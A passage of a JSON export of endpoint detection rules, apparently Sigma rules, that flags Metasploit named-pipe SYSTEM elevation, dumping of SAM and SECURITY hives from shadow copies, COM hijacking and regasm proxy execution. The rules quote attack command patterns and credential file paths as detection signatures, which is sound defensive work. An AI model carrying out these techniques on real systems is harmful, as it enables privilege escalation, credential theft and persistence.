ParentImage|endswith: '\\services.exe'\n\n selection_variant_cmd:\n # cmd.exe /c echo lddocl > \\\\.\\pipe\\lddocl\n Image|endswith: '\\cmd.exe'\n CommandLine|endswith: '/c echo ?????? > \\\\\\\\.\\\\pipe\\\\??????'\n\n selection_variant_rundll32:\n # rundll32.exe C:\\Windows\\TEMP\\lddocl.dll,a /p:lddocl\n Image|endswith: '\\rundll32.exe'\n CommandLine|endswith: '??????.dll,a /p:??????'\n\n condition: selection_services and 1 of selection_variant_*\nlevel: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86", "rule_name": "Metasploit Get SYSTEM Command Detected", "rule_description": "Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\nMetasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\nMetasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\nIt is recommended to investigate other malicious actions taken by the detected process and its ancestors.\n", "rule_creation_date": "2022-02-14", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1134.001", "attack.t1569.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.079579Z", "creation_date": "2026-03-23T11:45:34.079581Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.079586Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1003/002/", "https://attack.mitre.org/techniques/T1003/004/" ], "name": "t1003_registry_extract_shadowcopy.yml", "content": "title: Sensitive Registry Hive Dumped from Volume Shadow Copy\nid: 02fc96b9-8da8-4b40-8a75-557d9c2f79d3\ndescription: |\n Detects file accesses to registry hives saved inside a Volume Shadow Copy.\n Attackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\n This can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\n It is recommended to investigate the process trying to access the hives for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2023/06/26\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.002\n - attack.t1003.004\n - classification.Windows.Source.ShadowCopy\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_shadowcopy\n product: windows\ndetection:\n selection:\n Path|endswith:\n - '\\Windows\\System32\\config\\SYSTEM'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\RegBack\\SYSTEM'\n - '\\Windows\\System32\\config\\RegBack\\SAM'\n - '\\Windows\\System32\\config\\RegBack\\SECURITY'\n # - '\\Windows\\System32\\config\\SOFTWARE' # too many FP\n\n selection_remote_system:\n # Impacket’s secretsdump used with the option —use-remoteSSMethod.\n ProcessName: 'system'\n ProcessId: '4'\n SessionLogonType: 3\n\n exclusion_known_fp_win7:\n # seems to happen on win7 and 2008\n CreateOptionsStr:\n - 'FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0140 / FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n - 'FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0160 FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n CreateDispositionStr: 'FILE_OPEN' # 0x01 / FILE_OPEN\n\n exclusion_restore_point_creation:\n ProcessCommandLine:\n - '?:\\windows\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n - '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_wbengine:\n ProcessImage: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\system32\\vssvc.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpDlpService.exe'\n\n # another specific rule for this\n exclusion_ntdsutil:\n ProcessImage: '?:\\Windows\\System32\\ntdsutil.exe'\n\n exclusion_trusted_installer:\n ProcessImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sdrsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k SDRSVC'\n\n exclusion_rstrui:\n ProcessImage: '?:\\Windows\\system32\\rstrui.exe'\n\n exclusion_recoverydrive:\n # Recovery Media Creator\n ProcessImage: '?:\\Windows\\System32\\RecoveryDrive.exe'\n\n exclusion_search_protocolhost:\n ProcessImage: '?:\\Windows\\System32\\SearchProtocolHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n\n exclusion_igfxcui:\n ProcessGrandparentImage: '?:\\Windows\\system32\\igfxCUIService.exe'\n ProcessImage: '?:\\Windows\\System32\\igfxEM.exe'\n\n exclusion_cobian:\n ProcessImage|endswith:\n - '\\Cobian Backup 1?\\cbVSCService1?.exe'\n - '\\Cobian Backup ??\\cbVSCService.exe'\n - '\\Cobian Backup ??\\cbService.exe'\n - '\\CobianBackup\\cbVSCService1?.exe'\n - '\\CobianBackup\\cbVSCService.exe'\n\n exclusion_commvault:\n # For an unknwn reseaon the file has a valid signature but we say it is unsigned...\n ProcessImage|endswith:\n - '\\Commvault\\ContentStore\\Base\\cvd.exe'\n - '\\Commvault\\Base\\CLBackup.exe'\n - '\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n ProcessSignature: 'Commvault Systems, Inc.'\n\n exclusion_dell:\n ProcessDescription: 'Avamar Backup Client'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Dell Technologies Inc.'\n - 'EMC Corporation'\n\n condition: selection and ((not 1 of exclusion_*) or selection_remote_system)\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3", "rule_name": "Sensitive Registry Hive Dumped from Volume Shadow Copy", "rule_description": "Detects file accesses to registry hives saved inside a Volume Shadow Copy.\nAttackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\nThis can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\nIt is recommended to investigate the process trying to access the hives for malicious contents.\n", "rule_creation_date": "2023-06-26", "rule_modified_date": "2025-10-23", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003", "attack.t1003.002", "attack.t1003.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "032b28af-b4ce-4476-a201-8b2896158878", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623666Z", "creation_date": "2026-03-23T11:45:34.623668Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623672Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/", "https://github.com/eset/malware-ioc/blob/master/turla/README.adoc", "https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader", "https://attack.mitre.org/techniques/T1546/015/" ], "name": "t1546_015_component_object_model_hijacking.yml", "content": "title: Possible Component Object Model Hijacking\nid: 032b28af-b4ce-4476-a201-8b2896158878\ndescription: |\n Detects the possible hijacking of a Component Object Model (COM) in the registry.\n Attackers can use this method to achieve persistence through an event trigger execution.\n The DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\n It is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\nreferences:\n - https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html\n - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n - https://github.com/eset/malware-ioc/blob/master/turla/README.adoc\n - https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/09/29\nmodified: 2026/02/02\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.015\n - attack.execution\n - attack.t1559.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Hijacking\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_ehstorshell:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\InprocServer32\\(Default)'\n filter_ehstorshell:\n Details: '?:\\Windows\\System32\\EhStorShell.dll'\n\n selection_wmiutils:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)' # WbemDefaultPathParser\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EAC8A024-21E2-4523-AD73-A71A0AA2F56A}\\InprocServer32\\(Default)' # WbemQuery\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\\InprocServer32\\(Default)' # WbemStatusCode\n filter_wmiutils:\n Details: '%systemroot%\\system32\\wbem\\wmiutils.dll'\n\n selection_wmiprvsd:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4DE225BF-CF59-4CFC-85F7-68B90F185355}\\InprocServer32\\(Default)'\n filter_wmiprvsd:\n Details: '%systemroot%\\system32\\wbem\\wmiprvsd.dll'\n\n selection_wbemsvc:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemsvc:\n Details: '%systemroot%\\system32\\wbem\\wbemsvc.dll'\n\n selection_wbemprox:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemprox:\n Details: '%systemroot%\\system32\\wbem\\wbemprox.dll'\n\n selection_applicationframe:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{DDC05A5A-351A-4E06-8EAF-54EC1BC2DCEA}\\InprocServer32\\(Default)'\n filter_applicationframe:\n Details: '%systemroot%\\system32\\applicationframe.dll'\n\n selection_propsys:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\InprocServer32\\(Default)'\n filter_propsys:\n Details: '%systemroot%\\system32\\propsys.dll'\n\n selection_actioncenter:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\\InprocServer32\\(Default)'\n filter_actioncenter:\n Details: '%systemroot%\\system32\\actioncenter.dll'\n\n selection_thumbcache:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32\\(Default)'\n filter_thumbcache:\n Details: '%systemroot%\\system32\\thumbcache.dll'\n\n selection_syncreg:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{f82b4ef1-93a9-4dde-8015-f7950a1a6e31}\\InprocServer32\\(Default)'\n filter_syncreg:\n Details: '%systemroot%\\system32\\syncreg.dll'\n\n selection_repdrvfs:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7998DC37-D3FE-487C-A60A-7701FCC70CC6}\\InprocServer32\\(Default)'\n filter_repdrvfs:\n Details: '?:\\Windows\\system32\\wbem\\repdrvfs.dll'\n\n selection_psfactorybuffer:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\\InprocServer32\\(Default)'\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1293C733-3151-48F5-89DE-2457B4AB3FD2}\\InprocServer32\\(Default)'\n filter_psfactorybuffer:\n Details:\n - '?:\\Windows\\System32\\npmproxy.dll'\n - '?:\\Windows\\System32\\daxexec.dll'\n\n selection_sharetaskscheduler:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\\InprocServer32\\(Default)'\n filter_sharetaskscheduler:\n Details: '?:\\Windows\\system32\\windows.storage.dll'\n\n selection_sharingprivate:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\\InprocServer32\\(Default)'\n filter_sharingprivate:\n Details: '?:\\Windows\\System32\\ntshrui.dll'\n\n selection_eventsystem:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\\InprocServer32\\(Default)'\n filter_eventsystem:\n Details: '?:\\Windows\\system32\\es.dll'\n\n selection_msaa:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32\\(Default)'\n filter_msaa:\n Details: '?:\\Windows\\System32\\oleacc.dll'\n\n selection_autoplay:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{9207D8C7-E7C8-412E-87F8-2E61171BD291}\\InprocServer32\\(Default)'\n filter_autoplay:\n Details: '?:\\Windows\\system32\\shell32.dll'\n\n selection_notificationmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{A3B3C46C-05D8-429B-BF66-87068B4CE563}\\InprocServer32\\(Default)'\n filter_notificationmanager:\n Details: '?:\\Windows\\System32\\actioncenter.dll'\n\n selection_commonplaces:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{0997898B-0713-11D2-A4AA-00C04F8EEB3E}\\InprocServer32\\(Default)'\n filter_commonplaces:\n Details: '?:\\Windows\\System32\\windows.storage.dll'\n\n selection_identitystore:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{30d49246-d217-465f-b00b-ac9ddd652eb7}\\InprocServer32\\(Default)'\n filter_identitystore:\n Details: '?:\\Windows\\System32\\IDStore.dll'\n\n selection_unexpectedshutdownreason:\n TargetObject|endswith: '\\CLSID\\{68DDBB56-9D1D-4FD9-89C5-C0DA2A625392}\\InProcServer32\\(Default)'\n filter_unexpectedshutdownreason:\n Details: '%SystemRoot%\\system32\\stobject.dll'\n\n selection_printers:\n TargetObject|endswith: '\\CLSID\\{2227A280-3AEA-1069-A2DE-08002B30309D}\\InProcServer32\\(Default)'\n filter_printers:\n Details: '%SystemRoot%\\system32\\prnfldr.dll'\n\n condition: selection and (\n (selection_ehstorshell and not filter_ehstorshell) or\n (selection_wmiutils and not filter_wmiutils) or\n (selection_wmiprvsd and not filter_wmiprvsd) or\n (selection_wbemsvc and not filter_wbemsvc) or\n (selection_wbemprox and not filter_wbemprox) or\n (selection_applicationframe and not filter_applicationframe) or\n (selection_propsys and not filter_propsys) or\n (selection_actioncenter and not filter_actioncenter) or\n (selection_thumbcache and not filter_thumbcache) or\n (selection_syncreg and not filter_syncreg) or\n (selection_repdrvfs and not filter_repdrvfs) or\n (selection_psfactorybuffer and not filter_psfactorybuffer) or\n (selection_sharetaskscheduler and not filter_sharetaskscheduler) or\n (selection_sharingprivate and not filter_sharingprivate) or\n (selection_eventsystem and not filter_eventsystem) or\n (selection_msaa and not filter_msaa) or\n (selection_autoplay and not filter_autoplay) or\n (selection_notificationmanager and not filter_notificationmanager) or\n (selection_commonplaces and not filter_commonplaces) or\n (selection_identitystore and not filter_identitystore) or\n (selection_unexpectedshutdownreason and not filter_unexpectedshutdownreason) or\n (selection_printers and not filter_printers)\n )\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "032b28af-b4ce-4476-a201-8b2896158878", "rule_name": "Possible Component Object Model Hijacking", "rule_description": "Detects the possible hijacking of a Component Object Model (COM) in the registry.\nAttackers can use this method to achieve persistence through an event trigger execution.\nThe DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\nIt is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\n", "rule_creation_date": "2022-09-29", "rule_modified_date": "2026-02-02", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.persistence" ], "rule_technique_tags": [ "attack.t1546.015", "attack.t1559.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080770Z", "creation_date": "2026-03-23T11:45:34.080773Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080777Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://attack.mitre.org/techniques/T1218/009/" ], "name": "t1218_009_regasm_dll_load.yml", "content": "title: Suspicious Proxy Execution via regasm.exe\nid: 0363e1f9-7a85-414e-a37a-5ce7993e7db4\ndescription: |\n Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\n This may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\n AWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\n Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\n This can also be used by program installers in Windows.\n It is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/01/04\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regasm\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\regasm.exe'\n OriginalFileName: 'regasm.exe'\n\n filter_directory:\n CommandLine|contains:\n - ' ?:\\Program Files\\'\n - ' ?:\\Program Files (x86)\\'\n - ' ?:\\PROGRA~2\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\'\n\n exclusion_pdf_creator:\n ParentCommandLine|contains: 'PDFCreator-*_*_*-setup.tmp'\n\n exclusion_installers:\n ParentImage|endswith: '\\MsiExec.exe'\n ParentCommandLine|contains:\n - '-Embedding'\n - '/V'\n - '-V'\n CommandLine|contains:\n # SOLIDWORKS 3D Modelling\n - '?:\\ProgramData\\SOLIDWORKS\\SOLIDWORKS CAM\\MATLIBx64\\ '\n # Microsoft CCM\n - 'Microsoft.ConfigurationManagement.SensorFramework.dll'\n - 'Microsoft.ConfigurationManager.SensorManagedProvider.dll'\n # Altova Script Editor\n - 'AltovaScriptFormEditorHost*.dll'\n # Oskab 3D\n - 'Oskab3D.SDB.dll'\n # MicroStrategy Office Plugin\n - '/tlb:moimain.tlb moimain.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\Tekla.Structures.Model\\\\*\\Tekla.Structures.Model.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\tekla.structures\\\\*\\tekla.structures.dll'\n - '?:\\programdata\\service advisor\\cal\\connectivity applications\\support\\regasm.exe*'\n - '?:\\program files\\bruker\\nanoscopeanalysis\\regasm.exe /s nanoscopeanalysis.exe /tlb:hostapplication.tlb'\n - '?:\\program files (x86)\\bl\\bl\\\\*\\\\*\\regasm.exe*'\n - '*\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\regasm.exe *\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\siga.softwareactivation.comwrapperspw.???'\n - '*\\regasm.exe /codebase *\\smsappl\\assemblies\\observationmetier.dll'\n - '?:\\users\\\\*\\temp\\is-*.tmp\\regasm.exe /s /* /tlb ?:\\users\\\\*\\temp\\is-*.tmp\\innosetuptools.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\intunecontentmanager\\microsoft.configurationmanager.intunecontentmanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.azuremanagement.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.cloudbase.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase bullzip.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase ie11cloudmetering.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase pdf7.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe ?:\\windows\\system32\\dolbyaposvc\\dax3apidll.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\contentstore\\base*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe datev.crystalreports.x64bridge.dll /tlb /nologo'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanagement.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsyncact.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\base\\\\*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe edisys.iulm.*.dll*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.agievision_pages.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.charmillestechnologymanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.optionsconfiguration.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threaddatabase.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threadlayer.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /register /s cgm.axilibraries.interop.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe */silent* *\\programs\\sap businessobjects\\epm add-in\\epmofficeactivex.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe stellarexcel.dll /tlb:com.stellarexcel.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /tlb /codebase robotconnectionaddin.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsprintdvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u ?:/program files/common files/wondershare/pdfelement??/preview/*/pepreview?.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\\\regasm.exe /unregister ?:/program files/atempo/tina/bin/libtina_comps_clr4.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\becpwin\\gfxgateway*.dll /regfile:*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coalaclient\\gatewaycs.dll /tlb:*\\coalaclient\\gatewaycs.tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\revao\\exe\\eic.global.interop.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\masslynx\\acquitywrapper.dll /silent /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase seedkey*.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\system32\\farpoint.spread8.excel2007.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\opentrust\\fncopentrust.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\allegoria\\classfncallegoria.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\converttopdf\\fiducial.notaire.compta.rao.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fiducialwrappermailboxplanete\\fiducial.wrappermailboxplanetecompta.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fnc_scan\\fnc_scan.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\ifiducial_fnc.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\wrapper_clotureaffaire.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm 